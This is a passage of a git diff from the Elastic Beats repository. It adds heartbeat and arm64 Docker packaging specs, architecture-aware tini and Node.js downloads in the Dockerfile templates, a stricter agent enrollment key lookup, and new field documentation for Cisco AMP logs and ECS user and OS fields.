}}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' mode: 0644 @@ -179,6 +189,17 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' mode: 0644 skip_on_missing: true + /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' + mode: 0644 + /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512' + mode: 0644 + skip_on_missing: true + /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc: + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' + mode: 0644 + skip_on_missing: true /etc/{{.BeatName}}/data/{{.BeatName}}-{{ commit_short }}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz: source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' mode: 0644 @@ -273,6 +294,16 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' mode: 0644 skip_on_missing: true + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.sha512' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz.asc' + mode: 0644 + skip_on_missing: true 'data/{{.BeatName}}-{{ commit_short }}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz': source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.tar.gz' mode: 0644 @@ -336,6 +367,16 @@ shared: source: '{{.AgentDropPath}}/filebeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.asc' mode: 0644 skip_on_missing: true + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.sha512': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.sha512' + mode: 0644 + 'data/{{.BeatName}}-{{ commit_short }}/downloads/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.asc': + source: '{{.AgentDropPath}}/heartbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip.asc' + mode: 0644 + skip_on_missing: true 'data/{{.BeatName}}-{{ commit_short }}/downloads/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip': source: '{{.AgentDropPath}}/metricbeat-{{ beat_version }}{{if .Snapshot}}-SNAPSHOT{{end}}-{{.GOOS}}-{{.AgentArchName}}.zip' mode: 0644 @@ -402,6 +443,12 @@ shared: {{ commit }} mode: 0644 + - &agent_docker_arm_spec + <<: *agent_docker_spec + extra_vars: + from: 'arm64v8/centos:7' + buildFrom: 'arm64v8/centos:7' + # Deb/RPM spec for community beats. - &deb_rpm_spec <<: *common @@ -556,11 +603,22 @@ shared: mode: 0600 config: true + - &docker_arm_spec + <<: *docker_spec + extra_vars: + from: 'arm64v8/centos:7' + buildFrom: 'arm64v8/centos:7' + - &docker_ubi_spec extra_vars: image_name: '{{.BeatName}}-ubi8' from: 'docker.elastic.co/ubi8/ubi-minimal' + - &docker_arm_ubi_spec + extra_vars: + image_name: '{{.BeatName}}-ubi8' + from: 'registry.access.redhat.com/ubi8/ubi-minimal:8.2' + - &elastic_docker_spec extra_vars: repository: 'docker.elastic.co/beats' @@ -724,6 +782,7 @@ specs: <<: *elastic_license_for_deb_rpm - os: linux + arch: amd64 types: [docker] spec: <<: *docker_spec @@ -731,6 +790,7 @@ specs: <<: *elastic_license_for_binaries - os: linux + arch: amd64 types: [docker] spec: <<: *docker_spec @@ -738,6 +798,23 @@ specs: <<: *elastic_docker_spec <<: *elastic_license_for_binaries + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *docker_arm_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *docker_arm_spec + <<: *docker_arm_ubi_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + # Elastic Beat with Elastic License and binary taken the current directory. elastic_beat_xpack_reduced: ### @@ -813,6 +890,7 @@ specs: source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} - os: linux + arch: amd64 types: [docker] spec: <<: *docker_spec @@ -823,6 +901,7 @@ specs: source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} - os: linux + arch: amd64 types: [docker] spec: <<: *docker_spec @@ -833,6 +912,29 @@ specs: '{{.BeatName}}{{.BinaryExt}}': source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *docker_arm_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *docker_arm_spec + <<: *docker_arm_ubi_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./{{.XPackDir}}/{{.BeatName}}/build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + # Elastic Beat with Elastic License and binary taken from the x-pack dir. elastic_beat_agent_binaries: ### @@ -892,6 +994,7 @@ specs: mode: 0755 - os: linux + arch: amd64 types: [docker] spec: <<: *agent_docker_spec @@ -902,6 +1005,7 @@ specs: source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} - os: linux + arch: amd64 types: [docker] spec: <<: *agent_docker_spec @@ -912,6 +1016,29 @@ specs: '{{.BeatName}}{{.BinaryExt}}': source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *agent_docker_arm_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + + - os: linux + arch: arm64 + types: [docker] + spec: + <<: *agent_docker_arm_spec + <<: *docker_arm_ubi_spec + <<: *elastic_docker_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: ./build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + # Elastic Beat with Elastic License and binary taken from the x-pack dir. elastic_beat_agent_demo_binaries: diff --git a/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl b/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl index 844192627c67..cf2788af09ed 100644 --- a/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl +++ b/dev-tools/packaging/templates/docker/Dockerfile.elastic-agent.tmpl @@ -28,9 +28,7 @@ RUN mkdir -p {{ $beatHome }}/data {{ $beatHome }}/data/elastic-agent-{{ commit_s FROM {{ .from }} {{- if contains .from "ubi-minimal" }} -RUN for iter in {1..10}; do microdnf update -y && microdnf install -y shadow-utils && microdnf clean all && exit_code=0 && break || exit_code=$? && echo "microdnf error: retry $iter in 10s" && sleep 10; done; (exit $exit_code) -RUN curl -L https://github.com/stedolan/jq/releases/download/jq-1.6/jq-linux64 -o /usr/local/bin/jq && \ - chmod +x /usr/local/bin/jq +RUN for iter in {1..10}; do microdnf update -y && microdnf install -y shadow-utils jq && microdnf clean all && exit_code=0 && break || exit_code=$? && echo "microdnf error: retry $iter in 10s" && sleep 10; done; (exit $exit_code) {{- else }} # Installing jq needs to be installed after epel-release and cannot be in the same yum install command. RUN for iter in {1..10}; do yum update --setopt=tsflags=nodocs -y && yum install --setopt=tsflags=nodocs -y epel-release && yum clean all && exit_code=0 && break || exit_code=$? && echo "yum error: retry $iter in 10s" && sleep 10; done; (exit $exit_code) @@ -69,9 +67,22 @@ ENV GODEBUG="madvdontneed=1" # Add an init process, check the checksum to make sure it's a match RUN set -e ; \ - TINI_VERSION='v0.19.0' ; \ - TINI_BIN='tini-amd64' ; \ - TINI_SHA256='93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c' ; \ + TINI_BIN=""; \ + TINI_SHA256=""; \ + TINI_VERSION="v0.19.0"; \ + case "$(arch)" in \ + x86_64) \ + TINI_BIN="tini-amd64"; \ + TINI_SHA256="93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c"; \ + ;; \ + aarch64) \ + TINI_BIN="tini-arm64"; \ + TINI_SHA256="07952557df20bfd2a95f9bef198b445e006171969499a1d361bd9e6f8e5e0e81"; \ + ;; \ + *) \ + echo >&2 ; echo >&2 "Unsupported architecture \$(arch)" ; echo >&2 ; exit 1 ; \ + ;; \ + esac ; \ curl --retry 8 -S -L -O "https://github.com/krallin/tini/releases/download/${TINI_VERSION}/${TINI_BIN}" ; \ echo "${TINI_SHA256} ${TINI_BIN}" | sha256sum -c - ; \ mv "${TINI_BIN}" /usr/bin/tini ; \ diff --git a/dev-tools/packaging/templates/docker/Dockerfile.tmpl b/dev-tools/packaging/templates/docker/Dockerfile.tmpl index e42e525644c0..26302f0d1791 100644 --- a/dev-tools/packaging/templates/docker/Dockerfile.tmpl +++ b/dev-tools/packaging/templates/docker/Dockerfile.tmpl @@ -31,10 +31,10 @@ RUN microdnf -y --setopt=tsflags=nodocs update && \ RUN yum -y --setopt=tsflags=nodocs update \ {{- if (eq .BeatName "heartbeat") }} && yum -y install epel-release \ - && yum -y install atk cups gtk gdk xrandr pango.x86_64 libXcomposite.x86_64 libXcursor.x86_64 libXdamage.x86_64 \ - libXext.x86_64 libXi.x86_64 libXtst.x86_64 cups-libs.x86_64 libXScrnSaver.x86_64 libXrandr.x86_64 GConf2.x86_64 \ - alsa-lib.x86_64 atk.x86_64 gtk3.x86_64 ipa-gothic-fonts xorg-x11-fonts-100dpi xorg-x11-fonts-75dpi xorg-x11-utils \ - xorg-x11-fonts-cyrillic xorg-x11-fonts-Type1 xorg-x11-fonts-misc \ + && yum -y install atk cups gtk gdk xrandr pango libXcomposite libXcursor libXdamage \ + libXext libXi libXtst cups-libs libXScrnSaver libXrandr GConf2 \ + alsa-lib atk gtk3 ipa-gothic-fonts xorg-x11-fonts-100dpi xorg-x11-fonts-75dpi xorg-x11-utils \ + xorg-x11-fonts-cyrillic xorg-x11-fonts-Type1 xorg-x11-fonts-misc \ {{- end }} && yum clean all && rm -rf /var/cache/yum # See https://access.redhat.com/discussions/3195102 for why rm is needed @@ -83,9 +83,22 @@ ENV GODEBUG="madvdontneed=1" # Add an init process, check the checksum to make sure it's a match RUN set -e ; \ - TINI_VERSION='v0.19.0' ; \ - TINI_BIN='tini-amd64' ; \ - TINI_SHA256='93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c' ; \ + TINI_BIN=""; \ + TINI_SHA256=""; \ + TINI_VERSION="v0.19.0"; \ + case "$(arch)" in \ + x86_64) \ + TINI_BIN="tini-amd64"; \ + TINI_SHA256="93dcc18adc78c65a028a84799ecf8ad40c936fdfc5f2a57b1acda5a8117fa82c"; \ + ;; \ + aarch64) \ + TINI_BIN="tini-arm64"; \ + TINI_SHA256="07952557df20bfd2a95f9bef198b445e006171969499a1d361bd9e6f8e5e0e81"; \ + ;; \ + *) \ + echo >&2 ; echo >&2 "Unsupported architecture \$(arch)" ; echo >&2 ; exit 1 ; \ + ;; \ + esac ; \ curl --retry 8 -S -L -O "https://github.com/krallin/tini/releases/download/${TINI_VERSION}/${TINI_BIN}" ; \ echo "${TINI_SHA256} ${TINI_BIN}" | sha256sum -c - ; \ mv "${TINI_BIN}" /usr/bin/tini ; \ @@ -119,8 +132,20 @@ ENV PATH="$NODE_PATH/node/bin:$PATH" # cached node_modules, heartbeat then calls the global executable to run test suites # Setup node RUN cd /usr/share/heartbeat/.node \ + && NODE_DOWNLOAD_URL="" \ + && case "$(arch)" in \ + x86_64) \ + NODE_DOWNLOAD_URL=https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-linux-x64.tar.xz \ + ;; \ + aarch64) \ + NODE_DOWNLOAD_URL=https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-linux-arm64.tar.xz \ + ;; \ + *) \ + echo >&2 ; echo >&2 "Unsupported architecture \$(arch)" ; echo >&2 ; exit 1 ; \ + ;; \ + esac \ && mkdir -p node \ - && curl https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz | tar -xJ --strip 1 -C node \ + && curl ${NODE_DOWNLOAD_URL} | tar -xJ --strip 1 -C node \ && chmod ug+rwX -R $NODE_PATH \ && npm i -g -f @elastic/synthetics && chmod ug+rwX -R $NODE_PATH {{- end }} diff --git a/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl b/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl index d4c8d6e4645f..348a99dea4c9 100644 --- a/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl +++ b/dev-tools/packaging/templates/docker/docker-entrypoint.elastic-agent.tmpl @@ -37,9 +37,14 @@ function enroll(){ exit $exitCode fi echo $enrollResp - local apikeyId=$(echo $enrollResp | jq -r '.list[0].id') + local apikeyId=$(echo $enrollResp | jq -r '.list[] | select((.name | startswith("Default ")) and (.active == true)) | .id') echo $apikeyId + if [[ -z "${apikeyId}" ]]; then + echo "Default agent policy was not found. Please consider using own enrollment token (FLEET_ENROLLMENT_TOKEN)." + exit 1 + fi + enrollResp=$(curl ${KIBANA_HOST:-http://localhost:5601}/api/fleet/enrollment-api-keys/$apikeyId \ -H 'Content-Type: application/json' \ -H 'kbn-xsrf: true' \ diff --git a/filebeat/Dockerfile b/filebeat/Dockerfile index 8b3983fa8da3..3750939e8ce3 100644 --- a/filebeat/Dockerfile +++ b/filebeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/filebeat/Jenkinsfile.yml b/filebeat/Jenkinsfile.yml index ea1215b65140..109474258283 100644 --- a/filebeat/Jenkinsfile.yml +++ b/filebeat/Jenkinsfile.yml @@ -81,3 +81,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index 42e2d318a998..902d79382d8d 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -69,6 +69,7 @@ grouped in the following categories: * <> * <> * <> +* <> * <> * <> * <> @@ -84,6 +85,7 @@ grouped in the following categories: * <> * <> * <> +* <> * <> * <> * <> @@ -523,54 +525,6 @@ type: keyword Name of the group. -type: keyword - --- - -[float] -=== effective - -Effective user information. - - -*`user.effective.id`*:: -+ --- -Effective user ID. - -type: keyword - --- - -*`user.effective.name`*:: -+ --- -Effective user name. - -type: keyword - --- - -[float] -=== group - -Effective group information. - - -*`user.effective.group.id`*:: -+ --- -Effective group ID. - -type: keyword - --- - -*`user.effective.group.name`*:: -+ --- -Effective group name. - type: keyword -- @@ -20809,6 +20763,543 @@ Module for handling Cisco network device logs. +[float] +=== cisco.amp + +Module for parsing Cisco AMP logs. + + + +*`cisco.amp.timestamp_nanoseconds`*:: ++ +-- +The timestamp in Epoch nanoseconds. + + +type: date + +-- + +*`cisco.amp.event_type_id`*:: ++ +-- +A sub ID of the event, depending on event type. + + +type: keyword + +-- + +*`cisco.amp.detection`*:: ++ +-- +The name of the malware detected. + + +type: keyword + +-- + +*`cisco.amp.detection_id`*:: ++ +-- +The ID of the detection. + + +type: keyword + +-- + +*`cisco.amp.connector_guid`*:: ++ +-- +The GUID of the connector sending information to AMP. + + +type: keyword + +-- + +*`cisco.amp.group_guids`*:: ++ +-- +An array of group GUIDS related to the connector sending information to AMP. + + +type: keyword + +-- + +*`cisco.amp.vulnerabilities`*:: ++ +-- +An array of related vulnerabilities to the malicious event. + + +type: flattened + +-- + +*`cisco.amp.scan.description`*:: ++ +-- +Description of an event related to a scan being initiated, for example the specific directory name. + + +type: keyword + +-- + +*`cisco.amp.scan.clean`*:: ++ +-- +Boolean value if a scanned file was clean or not. + + +type: boolean + +-- + +*`cisco.amp.scan.scanned_files`*:: ++ +-- +Count of files scanned in a directory. + + +type: long + +-- + +*`cisco.amp.scan.scanned_processes`*:: ++ +-- +Count of processes scanned related to a single scan event. + + +type: long + +-- + +*`cisco.amp.scan.scanned_paths`*:: ++ +-- +Count of different directories scanned related to a single scan event. + + +type: long + +-- + +*`cisco.amp.scan.malicious_detections`*:: ++ +-- +Count of malicious files or documents detected related to a single scan event. + + +type: long + +-- + +*`cisco.amp.computer.connector_guid`*:: ++ +-- +The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved. + + +type: keyword + +-- + +*`cisco.amp.computer.external_ip`*:: ++ +-- +The external IP of the related host. + + +type: ip + +-- + +*`cisco.amp.computer.active`*:: ++ +-- +If the current endpoint is active or not. + + +type: boolean + +-- + +*`cisco.amp.computer.network_addresses`*:: ++ +-- +All network interface information on the related host. + + +type: flattened + +-- + +*`cisco.amp.file.disposition`*:: ++ +-- +Categorization of file, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.network_info.disposition`*:: ++ +-- +Categorization of a network event related to a file, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.network_info.nfm.direction`*:: ++ +-- +The current direction based on source and destination IP. + + +type: keyword + +-- + +*`cisco.amp.related.mac`*:: ++ +-- +An array of all related MAC addresses. + + +type: keyword + +-- + +*`cisco.amp.related.cve`*:: ++ +-- +An array of all related MAC addresses. + + +type: keyword + +-- + +*`cisco.amp.cloud_ioc.description`*:: ++ +-- +Description of the related IOC for specific IOC events from AMP. + + +type: keyword + +-- + +*`cisco.amp.cloud_ioc.short_description`*:: ++ +-- +Short description of the related IOC for specific IOC events from AMP. + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.disposition`*:: ++ +-- +Categorization of a IOC for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.identity.md5`*:: ++ +-- +MD5 hash of the related IOC. + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.identity.sha1`*:: ++ +-- +SHA1 hash of the related IOC. + + +type: keyword + +-- + +*`cisco.amp.network_info.parent.identify.sha256`*:: ++ +-- +SHA256 hash of the related IOC. + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.disposition`*:: ++ +-- +Categorization of a file archive related to a file, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.identity.md5`*:: ++ +-- +MD5 hash of the archived file related to the malicious event. + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.identity.sha1`*:: ++ +-- +SHA1 hash of the archived file related to the malicious event. + + +type: keyword + +-- + +*`cisco.amp.file.archived_file.identify.sha256`*:: ++ +-- +SHA256 hash of the archived file related to the malicious event. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.application`*:: ++ +-- +The application name related to Exploit Prevention events. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.attacked_module`*:: ++ +-- +Path to the executable or dll that was attacked and detected by Exploit Prevention. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.base_address`*:: ++ +-- +The base memory address related to the exploit detected. + + +type: keyword + +-- + +*`cisco.amp.file.attack_details.suspicious_files`*:: ++ +-- +An array of related files when an attack is detected by Exploit Prevention. + + +type: keyword + +-- + +*`cisco.amp.file.parent.disposition`*:: ++ +-- +Categorization of parrent, for example "Malicious" or "Clean". + + +type: keyword + +-- + +*`cisco.amp.error.description`*:: ++ +-- +Description of an endpoint error event. + + +type: keyword + +-- + +*`cisco.amp.error.error_code`*:: ++ +-- +The error code describing the related error event. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.severity`*:: ++ +-- +Severity result of the threat hunt registered to the malicious event. Can be Low-Critical. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_report_guid`*:: ++ +-- +The GUID of the related threat hunting report. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_hunt_guid`*:: ++ +-- +The GUID of the related investigation tracking issue. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_title`*:: ++ +-- +Title of the incident related to the threat hunting activity. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_summary`*:: ++ +-- +Summary of the outcome on the threat hunting activity. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_remediation`*:: ++ +-- +Recommendations to resolve the vulnerability or exploited host. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_id`*:: ++ +-- +The id of the related incident for the threat hunting activity. + + +type: keyword + +-- + +*`cisco.amp.threat_hunting.incident_end_time`*:: ++ +-- +When the threat hunt finalized or closed. + + +type: date + +-- + +*`cisco.amp.threat_hunting.incident_start_time`*:: ++ +-- +When the threat hunt was initiated. + + +type: date + +-- + +*`cisco.amp.file.attack_details.indicators`*:: ++ +-- +Different indicator types that matches the exploit detected, for example different MITRE tactics. + + +type: flattened + +-- + +*`cisco.amp.threat_hunting.tactics`*:: ++ +-- +List of all MITRE tactics related to the incident found. + + +type: flattened + +-- + +*`cisco.amp.threat_hunting.techniques`*:: ++ +-- +List of all MITRE techniques related to the incident found. + + +type: flattened + +-- + +*`cisco.amp.tactics`*:: ++ +-- +List of all MITRE tactics related to the incident found. + + +type: flattened + +-- + +*`cisco.amp.techniques`*:: ++ +-- +List of all MITRE techniques related to the incident found. + + +type: flattened + +-- + [float] === cisco.asa @@ -40795,7 +41286,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -40848,7 +41339,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -42039,6 +42530,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -43113,6 +43617,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -43283,6 +43800,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -46434,6 +46964,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -46609,6 +47140,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -46619,6 +47263,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: 